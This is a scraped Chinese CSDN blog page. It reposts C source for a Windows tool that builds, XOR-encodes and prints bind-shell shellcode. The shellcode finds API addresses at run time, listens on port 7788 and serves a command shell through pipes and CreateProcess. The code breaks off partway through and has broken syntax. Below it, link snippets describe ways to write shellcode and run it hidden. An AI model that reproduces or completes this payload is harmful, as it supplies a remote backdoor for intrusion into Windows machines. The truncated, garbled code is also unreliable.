c语言添加shellcode到,【转】 使用C语言编写提取通用shellcode的程序

最新推荐文章于 2023-08-12 23:38:42 发布
最新推荐文章于 2023-08-12 23:38:42 发布
阅读量260 收藏
点赞数
文章标签: c语言添加shellcode到
本文详细介绍了Shellcode的解码和执行过程,包括使用XOR法加微调法进行解码的函数以及动态搜索API地址的Shellcode编写技术。示例代码展示了如何在VC环境下编译和运行Shellcode,同时提供了调试模式和标准C语言格式打印Shellcode的功能。
摘要由CSDN通过智能技术生成

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

出处:internet

修改:Hume/冷雨飘心

测试:Win2K SP4 Local / Win2003 SP0 Local

注释:我非我[F.S.T]

说明:此程序可以用标准c语言string格式打印出你所在ShellCodes函数中编写的shellcode

用vc编译时请使用Release格式并取消优化设置,否则不能正常运行

*/

#include 

#include 

#include 

#define  DEBUG 1  //定义为调试模式。本地测试用。打印shellcode后立即执行shellcode

//

//函数原型

//

void     DecryptSc();  //shellcode解码函数,使用的是xor法加微调法

void     ShellCodes();  //shellcode的函数,因为使用了动态搜索API地址。所以所有WINNT系统通杀

void     PrintSc(char *lpBuff, int buffsize);  //PrintSc函数用标准c格式打印

//

//用到的部分定义

//

#define  BEGINSTRLEN    0x08    //开始字符串长度

#define  ENDSTRLEN      0x08    //结束标记字符的长度

#define  nop_CODE       0x90    //填充字符,用于不确定shellcode入口用

#define  nop_LEN        0x0     //ShellCode起始的填充长度,真正shellcode的入口

#define  BUFFSIZE       0x20000 //输出缓冲区大小

#define  sc_PORT        7788    //绑定端口号 0x1e6c

#define  sc_BUFFSIZE    0x2000  //ShellCode缓冲区大小

#define  Enc_key        0x7A    //编码密钥

#define  MAX_Enc_Len    0x400   //加密代码的最大长度 1024足够?

#define  MAX_Sc_Len     0x2000  //hellCode的最大长度 8192足够?

#define  MAX_api_strlen 0x400   //APIstr字符串的长度

#define  API_endstr     "strend"//API结尾标记字符串

#define  API_endstrlen  0x06    //标记字符串长度

//定义函数开始字符,定位用

#define PROC_BEGIN __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90\

__asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90

#define PROC_END PROC_BEGIN

//---------------------------------------------------

enum{       //Kernel32中的函数名定义,用于编写自定义的shellcode。下同

_CreatePipe,

_CreateProcessA,

_CloseHandle,

_PeekNamedPipe,

_ReadFile,

_WriteFile,

_ExitProcess,

//WS2_32

_WSAStartup,

_WSASocket

_socket,

_bind,

_listen,

_accept,

_send,

_recv,

_ioctlsocket,

_closesocket,

//本机测试User32

_MessageBeep,

_MessageBoxA,

API_num

};

//

//代码这里开始

//

int __cdecl main(int argc, char **argv)

{

//shellcode中要用到的字符串

static char ApiStr[]="\x1e\x6c"   //端口地址7788

//Kernel32中查找的API函数名称,用来查找函数地址,下同

"CreatePipe""\x0"

"CreateProcessA""\x0"

"CloseHandle""\x0"

"PeekNamedPipe""\x0"

"ReadFile""\x0"

"WriteFile""\x0"

"ExitProcess""\x0"

//其它API中用到的API

"wsock32.dll""\x0"

"socket""\x0"

"bind""\x0"

"listen""\x0"

"accept""\x0"

"send""\x0"

"recv""\x0"

"ioctlsocket""\x0"

weixin_39876450
关注
第16节 实战:文件shellcode
imbyter师哥的博客
05-14 1701
我最近做了一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。
C语言写的shellcode
03-05
C语言写的开端口的shellcode 打开9878端口的ShellCode源代码
查看完整版本: 使用C语言编写提取通用shellcode程序
yingfox的专栏
11-13 971
导读:   使用C语言编写提取通用shellcode程序文章修改:Hume/冷雨飘心   文章注释:我非我[F.S.T]   信息来源:黑客基地   [code]/*   说明:此程序可以用标准c语言string格式打印出你所在ShellCodes函数中编写shellcode   用vc编译时请使用Release格式并取消优化设置,否则不能正常运行   */   #include  
使用C编译器编写shellcode
Tody Guo的专栏
12-08 1564
原文出处: Nick Harbour   译文出处: IDF徐文博 背景 有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代码仅能靠它自己,作者无法使用现代软件开发的实践来推
使用C语言编写通用shellcode程序
TYJJXSJ的专栏
01-29 2155
/*   使用C语言编写通用shellcode程序   出处:internet   修改:Hume/冷雨飘心   测试:Win2K SP4 Local   */    #include    #include    #include    #define  DEBUG 1    //    //函数原型    //    void    
linux c语言shellcode,shellcode编写
weixin_36287955的博客
05-12 833
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?​ shellcode可以用于在栈溢出或者堆溢出的漏洞中用于跳后执行的代码。本文的代码是在ubuntu 18.04 64位的linux操作系统。​ 首先是一个用于执行shellcodec语言程序:123456char shellcode[] = "";int (int argc, char...
演示几种用c语言来执行shellcode(其实也就是机器码)的方式,shellcode(示例代码)
weixin_36200896的博客
05-24 859
简介这篇文章主要介绍了shellcode(示例代码)以及相关的经验技巧,文章约1446字,浏览量241,点赞数8,值得推荐!/** 作者: 冷却* 时间: 2009年2月21日* E-mail: leng_que@yahoo.com.cn* 描述: 演示几种用C语言来执行shellcode(其实也就是机器码)的方式* 备注:在WindowsXP SP3下测试成功*///一段打开Windo...
c语言 sysinfo_【干货分享】手把手简易实现shellcode及详解
weixin_36463292的博客
02-23 406
阅读:38,301漏洞利用中必不可缺的部分就是shellcodeshellcode是用来发送到服务器利用特定漏洞的代码,它能在极小的空间内完成一些基本而重要的工作。下面跟着我一步一步学习shellcode编写和验证吧!学而不知道,与不学同;知而不能行,与不知同。 ——黄睎1简介漏洞利用中必不可缺的部分就是shellcodeshellcode能在极小的空间内完成一些基本而重要的工作。Shell...
快速将Windows动态链接库换为ShellCode-C/C++开发
05-26
DllToShellCode快速换Windows动态链接库到ShellCode功能支持32位和64位支持压缩(使用ntdll RtlCompressBuffer函数或aplib)支持两种模式Direc DllToShellCode快速换Windows动态链接库到ShellCode功能支持32位和...
运用C编写ShellCode代码教程
最新发布
高性价比服务器就选:蓝易云
08-12 286
以上是一个简单的教程,介绍了使用C语言编写ShellCode的基本步骤。由于ShellCode的复杂性和潜在的危险性,建议只在合法和授权的环境中进行相关实验和研究。请谨慎行事,并确保你对相关技术和法律的了解。需要注意的是,编写使用ShellCode涉及到计算机安全的领域,需要遵循合法和道德的原则。在进行ShellCode开发和使用之前,请确保你有合适的授权和法律许可,并遵守相关法律和规定。编写ShellCode是一项高级技术,需要深入了解计算机体系结构和操作系统底层原理。
1.8 运用C编写ShellCode代码
CSDN
07-13 4770
在笔者前几篇文章中,我们使用汇编语言并通过自定位的方法实现了一个简单的`MessageBox`弹窗功能,但由于汇编语言过于繁琐在编写效率上不仅要考验开发者的底层功底,还需要写出更多的指令集,这对于普通人来说是非常困难的,当然除了通过汇编来实现`ShellCode`的编写以外,使用C同样可以实现编写,在多数情况下读者可以直接使用C开发,只有某些环境下对ShellCode条件有极为苛刻的长度限制时才会考虑使用汇编。
使用C编写shellcode
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
11-23 898
使用C编写shellcode 背景 有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为 shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代 码仅能靠它自己,作者无法使用现 代软件开发的实践来推进shellcode编写
【笔记】使用C语言编写win32平台Shellcode
LemonLENG的博客
06-08 588
自:http://www.tuicool.com/articles/eMJfaea — Pwn150 Word2003部分 例子: /* void *get_kernel32_base() { __asm { push ebp xor ecx,ecx mov esi,fs:0x30 ;        //fs:30为PEB指针 mov esi, [esi + 0x0C
Shellcode编写
WHACKW的专栏
06-06 1872
上次学习了下堆喷漏洞的原理,虽说之前有学习过缓冲区溢出的原理,但还没了解过堆喷这个概念,于是趁此机会学习了,顺便复习了缓冲区溢出这块知识,之前由于各种原因对Shellcode编写只是了解个大概,并没有真正动手写过一个Shellcode。眼前遇到个堆喷漏洞找Shellcode时就下决定自己写个Shellcode,考虑到时间和精力的有限就写个计算器简单的练练手,顺便让像我这种小白人士学习学习。。。
C语言执行shellcode的五种方法
热门推荐
云守护的专栏
05-30 1万+
//C语言执行shellcode的五种方法 #include #include //data段可读写 #pragma comment(linker, "/section:.data,RWE") //不显示窗口 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") #pragma comment
提取shellcode
weixin_33725807的博客
08-24 100
说明:此程序可以用标准c语言string格式打印出你所在ShellCodes函数中编写shellcode 用vc编译时请使用Release格式并取消优化设置,否则不能正常运行 */ #i nclude <windows.h> #i nclude <stdio.h> #i nclude <winioctl.h> #define DEBUG ...
linux c语言shellcode,二进制入门-打造Linux shellcode基础篇
weixin_42412939的博客
05-12 584
0x01 前言本文的目的不是为了介绍如何进行恶意的破坏性活动,而是为了教会你如何去防御此类破坏性活动,以帮助你扩大知识范围,完善自己的技能,如有读者运用本文所学技术从事破坏性活动,本人概不负责。0x02 什么是Shellcodeshellcode是用作利用软件漏洞的有效载荷的一小段代码,因为它通常启动一个命令shell,攻击者可以从中控制受攻击的机器,所以称他为shellcode。但是任何执行类似...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值